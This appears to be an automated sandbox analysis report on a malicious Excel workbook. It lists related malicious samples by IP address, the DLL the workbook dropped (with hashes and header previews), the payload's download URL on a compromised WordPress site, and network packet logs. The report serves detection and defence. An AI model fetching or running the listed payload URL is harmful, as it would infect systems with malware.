                                                                                                                                                  1. Trace Together v2.5.2 (07 Dec).apkGet hashmaliciousBrowse
                                                                                                                                                  • 172.217.20.227
                                                                                                                                                  UNIFIEDLAYER-AS-1USClaim-9696823-02092021.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.112.213
                                                                                                                                                  Claim-9696823-02092021.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.112.213
                                                                                                                                                  Claim-292671392-02082021.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.95
                                                                                                                                                  Claim-292671392-02082021.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.95
                                                                                                                                                  DYTh8qC0IAZAWUc.exeGet hashmaliciousBrowse
                                                                                                                                                  • 108.179.232.42
                                                                                                                                                  Tuesday, February 9th, 2021 83422 a.m., 20210209083422.7B8380338EC1D61B@sophiajoyas.cl.htmlGet hashmaliciousBrowse
                                                                                                                                                  • 50.87.150.0
                                                                                                                                                  vG4U0RKFY2.exeGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.218.118
                                                                                                                                                  Claim-688493464-02082021.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.95
                                                                                                                                                  Claim-688493464-02082021.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.95
                                                                                                                                                  index_2021-02-08-19_41.dllGet hashmaliciousBrowse
                                                                                                                                                  • 198.57.200.100
                                                                                                                                                  SecuriteInfo.com.Trojan.Dridex.735.19015.dllGet hashmaliciousBrowse
                                                                                                                                                  • 198.57.200.100
                                                                                                                                                  P012108.htmGet hashmaliciousBrowse
                                                                                                                                                  • 216.172.167.66
                                                                                                                                                  RFQ#100027386.exeGet hashmaliciousBrowse
                                                                                                                                                  • 108.167.172.191
                                                                                                                                                  Friday_ February 5th_ 2021 64427 a.m._ 20210205064427.64791275BD060468@juidine.com.htmlGet hashmaliciousBrowse
                                                                                                                                                  • 50.87.150.0
                                                                                                                                                  sdsadasdf.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.93.238
                                                                                                                                                  sdsadasdf.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.93.238
                                                                                                                                                  Purchase price POP.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 50.87.144.106
                                                                                                                                                  Thursday, February 4th, 2021 103440 p.m., 20210204223440.464D4D4AD1BFDE50@juidine.com.htmlGet hashmaliciousBrowse
                                                                                                                                                  • 50.87.150.0
                                                                                                                                                  TSLiIABK75.exeGet hashmaliciousBrowse
                                                                                                                                                  • 162.241.217.171
                                                                                                                                                  gc79a7rUNV.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.20.95

                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                  37f463bf4616ecd445d4a1937da06e19CustomerComplaint.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  necessary (50).xlsGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  ct.dllGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  LawyerComplaintReport.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  CompensationClaim-46373845-02032021.xlsGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  February Payroll.xls.htmGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  RFQ 20RFQ00106 - ID N#U00b0. 04129.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  RFQ 20RFQ00106 - ID N#U00c2#U00b0. 04129.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  contract (48).xlsGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  SP AIR B00,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  DHL_119040 nyugtabizonylat,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  answer (36).xlsGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  Specifications.xlsxGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  REVISED_EPDA _ Statment & Tuticorin MV GRACE.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  QuDjMtiFx0.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  255423.jhertlein.255423.htmGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  yqwit.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  mq5QuYgwNX.dllGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  DHL_119040 documento de recibo,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102
                                                                                                                                                  P012108.htmGet hashmaliciousBrowse
                                                                                                                                                  • 192.185.16.102

                                                                                                                                                  Dropped Files

                                                                                                                                                  No context

                                                                                                                                                  Created / dropped Files

                                                                                                                                                  C:\ProgramData\ddg\11.dll
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):292864
                                                                                                                                                  Entropy (8bit):6.716033334198825
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:7m3Ztpl9Lpeyx09/34JOs7npgMJTVyMKN71TzjmDExUQQsP9+izoQiQ8QWQtQuQc:6pR+cTnylZPjmJQQsVj/Tmcss+l/
                                                                                                                                                  MD5:B6F4155A945D241F4E5228571C2AB39C
                                                                                                                                                  SHA1:2F4C7FD261CCFE3C4E3DE686A056251035DE489E
                                                                                                                                                  SHA-256:CE7F1D11DD7BEC82B96DC9472AB1D36CBA5E1C99F0480DBA6DD60CD3090DE320
                                                                                                                                                  SHA-512:5E973F8C2168CBFB3C476703FAD6C5F2E90E65C39C7CB6828F759437BDE42A1718EEC9F1BC53874326D14C4F778FCE7FA30A48065B2E36618A202921CDA98642
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.f...f...f...4..f...4..f...4.f.......f...f...f.....f......f...4..f......f..Rich.f..........................PE..L.....T...........!.....*...J...............@...............................p............@.........................PA..C....A..<....@..T....................P..x...pA..8............................*..@............@..$............................text...*(.......*.................. ..`.rdata.......@......................@..@.data...@....P.......8..............@....rsrc...T....@.......R..............@..@.reloc..x....P... ...X..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{D28724D9-6B49-11EB-90E5-ECF4BB2D2496}.dat
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):21592
                                                                                                                                                  Entropy (8bit):1.7491965235907891
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:IwJhGcpr+GwpL6G/ap8AcrGIpcmLAGvnZpvmJWGouuRqp9meGo4SuMVu1pmmuGWz:rJXZ2Zg2Ac9WaZtAyAfiFMo1MVkoP
                                                                                                                                                  MD5:B0E851D33A85E070D007195391C2B6C5
                                                                                                                                                  SHA1:F689A186486EAE7A083F1AE20FEE7767C3365F8D
                                                                                                                                                  SHA-256:559660D69D5A3ADEEE51476F9593B0D87B067953461A095DB492962D6D0BE876
                                                                                                                                                  SHA-512:15D491E6808891392A1F26CB0DC568C7E8C204029F68B8BFADBEA1A735DBA9D3A86BA341FBFB2DF6BF9619C5C53BF81A77D8B0B34E6ADA3F2707FC96330D5940
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{D28724DB-6B49-11EB-90E5-ECF4BB2D2496}.dat
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:Microsoft Word Document
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):16984
                                                                                                                                                  Entropy (8bit):1.5680702315474737
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:48:Iw+hGcprHGwpakJhG4pQSdGrapbSOrGQpBeGHHpcAsTGUpG:r+XZRQcz6OBSOFjt2AkA
                                                                                                                                                  MD5:25487A3F830AB47E33C53E7A483219DF
                                                                                                                                                  SHA1:3C370BE7D4101FEC94D3274E5713254C9B3ACCCC
                                                                                                                                                  SHA-256:2B24C29AC46623096123DE95A310F0C6BA2424BB07B93C9E7E38EE4F38BF336D
                                                                                                                                                  SHA-512:AD81FD30AF4EB42136ED9205ADD26BE42CDD5E809EC7D954A3BD84EEFEFAF162218EC44ABFAA8C22F5E66503CBCCA81FB52427D9A39D3C4DBA1C42BF53C58189
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\8F740160-CB42-41BF-ADD2-59ED776F89FF
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):133103
                                                                                                                                                  Entropy (8bit):5.376512326572846
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:ucQceNqaBtA3gZw+pQ9DQW+zAUH34ZldpKWXboOilXPErLLPEh:OrQ9DQW+zBX84
                                                                                                                                                  MD5:E74EE03EC77033FFBC44F9D0E3150C17
                                                                                                                                                  SHA1:2AEB424ABD664F8C29D3632C086CBA4B0C0AEA1E
                                                                                                                                                  SHA-256:64430C437AA94991F105822F91761FC5D002C6EC4E880D4DF8F0A46D4C8DFE9B
                                                                                                                                                  SHA-512:E2DD772D1BC7CBC4F5F82797BD9C8F2B5F12D3752D8F3D2F8179C47454512D5FB0ACB7913B9497836252ACDB775DFA300655B65B47032073E5ACB6ACF85428B5
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-02-09T17:41:40">.. Build: 16.0.13802.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\55CDA90A.png
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PNG image data, 1200 x 800, 8-bit/color RGBA, non-interlaced
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):33923
                                                                                                                                                  Entropy (8bit):7.68545544084692
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:384:/bJTVSjT1t05IO4gCdzJ22tjSKKSYkIfE8taQO30pTVuClvHzwCFGP4yQaf5dMlU:7w1C5GjhjjRgkNOLOkyPM4rM+H
                                                                                                                                                  MD5:4A3975F458CA57A2E7A2139AD0B1F6AC
                                                                                                                                                  SHA1:2D39BBE49EE7AA36EE363BF8113543A8CFD45FF5
                                                                                                                                                  SHA-256:D1A22C76ABC644665B92855CD734250DD3B3E26E5CA40A9B1D5F4AD3367F9B69
                                                                                                                                                  SHA-512:D12F9A21000241BC04CAD957667993C2AC12F5A9B2DABA5F64D5BC1023C16FBB5E43FBF9B6A1A8B8D7444AF7C26BD2F377CEC9E7A3E2F8DE9D73F3A979EBE044
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: .PNG........IHDR....... .....3.......pHYs.................sRGB.........gAMA......a.....IDATx.....]u}7....@P\@Il...D..*M...6..c..Z.....b+...O..>]..h..U..V*...m5Ikk*.H..b.K.j.......?.3s.3w.r.......d..{.{f.g....m...{4....@.vO.....1......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`.....5......Y.`......=.m}q..4H...~.=.....3}..A...nO...7&.....F.......i..v..i.=...4....r`.!....Y.`.....5......Y.`.....5......Ys.B....z|:~..........{.{../..[._l.......I.EV.~..i..?!m.......~/..E..~.Mi.A...C...X...L6...w.O.(........[>..n.`...>.y......~.].~M..m....q{.>....xv....}4...k...|$1}^....~......L'.....'>5.......s.~...3_|r.i?.......>
                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2200[1].dll
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:downloaded
                                                                                                                                                  Size (bytes):292864
                                                                                                                                                  Entropy (8bit):6.716033334198825
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3072:7m3Ztpl9Lpeyx09/34JOs7npgMJTVyMKN71TzjmDExUQQsP9+izoQiQ8QWQtQuQc:6pR+cTnylZPjmJQQsVj/Tmcss+l/
                                                                                                                                                  MD5:B6F4155A945D241F4E5228571C2AB39C
                                                                                                                                                  SHA1:2F4C7FD261CCFE3C4E3DE686A056251035DE489E
                                                                                                                                                  SHA-256:CE7F1D11DD7BEC82B96DC9472AB1D36CBA5E1C99F0480DBA6DD60CD3090DE320
                                                                                                                                                  SHA-512:5E973F8C2168CBFB3C476703FAD6C5F2E90E65C39C7CB6828F759437BDE42A1718EEC9F1BC53874326D14C4F778FCE7FA30A48065B2E36618A202921CDA98642
                                                                                                                                                  Malicious:true
                                                                                                                                                  Reputation:low
                                                                                                                                                  IE Cache URL:https://urbandancecity.com/wp-content/cache/stats/5fe/5bc/2200.dll
                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.f...f...f...4..f...4..f...4.f.......f...f...f.....f......f...4..f......f..Rich.f..........................PE..L.....T...........!.....*...J...............@...............................p............@.........................PA..C....A..<....@..T....................P..x...pA..8............................*..@............@..$............................text...*(.......*.................. ..`.rdata.......@......................@..@.data...@....P.......8..............@....rsrc...T....@.......R..............@..@.reloc..x....P... ...X..............@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\2E720000
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):76147
                                                                                                                                                  Entropy (8bit):7.741958925688105
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:1536:ech4kJGZj1jky04V4Tbit7iI5DzxbPoOwP8X0oZA+vy:Th4Sqj1I4miRiI5fhoOG+6b
                                                                                                                                                  MD5:2B61B6A837C03211466E67332F663740
                                                                                                                                                  SHA1:F15AE7179ED30FF735DD7E2B289D1E53C570A96E
                                                                                                                                                  SHA-256:456DF6BFF51D037FCF08E77E32A9315E2162C70030F6CE8CD90575028288E4FF
                                                                                                                                                  SHA-512:D96E89F27A1898B3451B04555B7E85DC66D57C4F45581CE0612F509BB514CF99CDDB3DC9BC18ACE995095FE0522AE10D3ED7E554CEA1EEA008CF9A10BF4CFEEA
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: .]o.0...'.?D...C..c".....J.~......d.-......B#"57.b.y......V... ........B..&..~.......5P...r9..ir.r...6.&m.......Y....#s.5...7.1.`....rk".X..L'?a..U,..x{M.LC.....TM.N..>.Y1..U.sNI."N.>....... ,...S....D.*.%2.[....ohzP.....+3Xh.._.7...K...jS..........o..-.T......E..I.F....T.._i..6l...4O.{.re..2~...E..i.....9N...u .....} ....8. ...n....u.my>../..1....^......y<Bns`I..R.z.}...r.<.......y.....@7_..}..nL.".|.{.......].......L..3]...w....o.u......<..T]:l.>J...].t......C:...;.i>.M........PK..........!.l4.>....Q.......[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DF206185CB52F6F9D7.TMP
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):25657
                                                                                                                                                  Entropy (8bit):0.3135785170840025
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lRg9lRA9lTS9lTy9lSSd9lSSd9lwO9lwe9l2R:kBqoxKAuvScS+hfR
                                                                                                                                                  MD5:B40C408BF1C042CC61D461CA11CB65FF
                                                                                                                                                  SHA1:44E8763B9A53CD3535EBC904CB72180BE60F46AC
                                                                                                                                                  SHA-256:01A7246DC1C070145F217EB19AF41FDB477A3B64F67E46EEE878C1572F76C7F6
                                                                                                                                                  SHA-512:A45C01B6DCA983E52C5339C2234E60B9B822E0BA339C4CC44403CF4D949458D03B46369541BC45E64840A8637D51552D925260D04DC4A6B723D659BB24C0B0C1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\AppData\Local\Temp\~DFEB4D811C683D48A8.TMP
                                                                                                                                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):12917
                                                                                                                                                  Entropy (8bit):0.39569477813375487
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:c9lLh9lLh9lIn9lIn9lo69loq9lWdHZHC:kBqoIlTd5i
                                                                                                                                                  MD5:CDC89AAA216BCDA2BF23D81FE673B308
                                                                                                                                                  SHA1:D8EE470B27E5594E45F96F4D7DBF10F327A65BC1
                                                                                                                                                  SHA-256:B60FB7172EF3C0EC2AE5871D1E71A09045EF2893B812D51B56B35F917E963B92
                                                                                                                                                  SHA-512:5CF2F6DD31F40F8E6C46614B7F4826127C785421B64356746D93C35AD99573123C9B1B42054A924BF450C42D7E29562AC02D3CEAB4EB01CC1D95F618264B2C6B
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:low
                                                                                                                                                  Preview: .............................*%..H..M..{y..+.0...(................... ...............................................*%..H..M..{y..+.0...(................... ..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  C:\Users\user\Desktop\~$Attached_File_898318.xlsb
                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):165
                                                                                                                                                  Entropy (8bit):1.6081032063576088
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                                  MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                                  SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                                  SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                                  SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Reputation:high, very likely benign file
                                                                                                                                                  Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                  Static File Info

                                                                                                                                                  General

                                                                                                                                                  File type:Microsoft Excel 2007+
                                                                                                                                                  Entropy (8bit):7.781038613841343
                                                                                                                                                  TrID:
                                                                                                                                                  • Excel Microsoft Office Binary workbook document (47504/1) 49.74%
                                                                                                                                                  • Excel Microsoft Office Open XML Format document (40004/1) 41.89%
                                                                                                                                                  • ZIP compressed archive (8000/1) 8.38%
                                                                                                                                                  File name:Attached_File_898318.xlsb
                                                                                                                                                  File size:100969
                                                                                                                                                  MD5:a8532cadcdc6aa2ca92e78352727bd50
                                                                                                                                                  SHA1:de9a89b9a1ac2778660695a982b9f34641fd3608
                                                                                                                                                  SHA256:8c54fb4a33fef841a472e5c7d92b49c1d589a8af374e510331f72fb5a4189c4a
                                                                                                                                                  SHA512:ac11ab0d7b4534584ef34e7d217f43592298f89f0d6f230fc1ab30471d99aaac1dd5e170f0097d760d9c0d7c51a1f6012b29b3ba2f4a356b2c8587a8de2af261
                                                                                                                                                  SSDEEP:3072:W6GiXh/woPcEMuYM76xbTD3xbqj1I4TpFFEJ/:FGix/bkJMmxP7xbkIGz2J/
                                                                                                                                                  File Content Preview:PK..........!.._\.}...........[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                  File Icon

                                                                                                                                                  Icon Hash:74f0d0d2c6d6d0f4

                                                                                                                                                  Static OLE Info

                                                                                                                                                  General

                                                                                                                                                  Document Type:OpenXML
                                                                                                                                                  Number of OLE Files:1

                                                                                                                                                  OLE File "Attached_File_898318.xlsb"

                                                                                                                                                  Indicators

                                                                                                                                                  Has Summary Info:
                                                                                                                                                  Application Name:
                                                                                                                                                  Encrypted Document:
                                                                                                                                                  Contains Word Document Stream:
                                                                                                                                                  Contains Workbook/Book Stream:
                                                                                                                                                  Contains PowerPoint Document Stream:
                                                                                                                                                  Contains Visio Document Stream:
                                                                                                                                                  Contains ObjectPool Stream:
                                                                                                                                                  Flash Objects Count:
                                                                                                                                                  Contains VBA Macros:

                                                                                                                                                  Network Behavior

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Feb 9, 2021 18:41:48.577832937 CET4972780192.168.2.6139.162.190.91
                                                                                                                                                  Feb 9, 2021 18:41:48.619759083 CET8049727139.162.190.91192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:48.620371103 CET4972780192.168.2.6139.162.190.91
                                                                                                                                                  Feb 9, 2021 18:41:48.621252060 CET4972780192.168.2.6139.162.190.91
                                                                                                                                                  Feb 9, 2021 18:41:48.662097931 CET8049727139.162.190.91192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:48.785017967 CET8049727139.162.190.91192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:48.786403894 CET4972780192.168.2.6139.162.190.91
                                                                                                                                                  Feb 9, 2021 18:41:49.003052950 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:49.161890030 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:49.163575888 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:49.165004015 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:49.323724985 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:49.324743986 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:49.324795961 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:49.324846983 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:49.324891090 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:49.324894905 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:49.324956894 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:49.324960947 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:49.324978113 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:49.329449892 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:49.329564095 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:49.755325079 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:49.916503906 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:49.916794062 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:49.918332100 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.119045019 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.207824945 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.207856894 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.207871914 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.207890987 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.207909107 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.207927942 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.207945108 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.207962036 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.207973957 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.207990885 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.207993984 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.208062887 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.366602898 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366633892 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366651058 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366667986 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366683006 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366702080 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366722107 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366736889 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366754055 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366770029 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366781950 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366791964 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.366797924 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366810083 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366827011 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366858006 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.366882086 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366884947 CET49728443192.168.2.6192.185.16.102
                                                                                                                                                  Feb 9, 2021 18:41:50.366902113 CET44349728192.185.16.102192.168.2.6
                                                                                                                                                  Feb 9, 2021 18:41:50.366940022 CET49728443192.168.2.6192.185.16.102
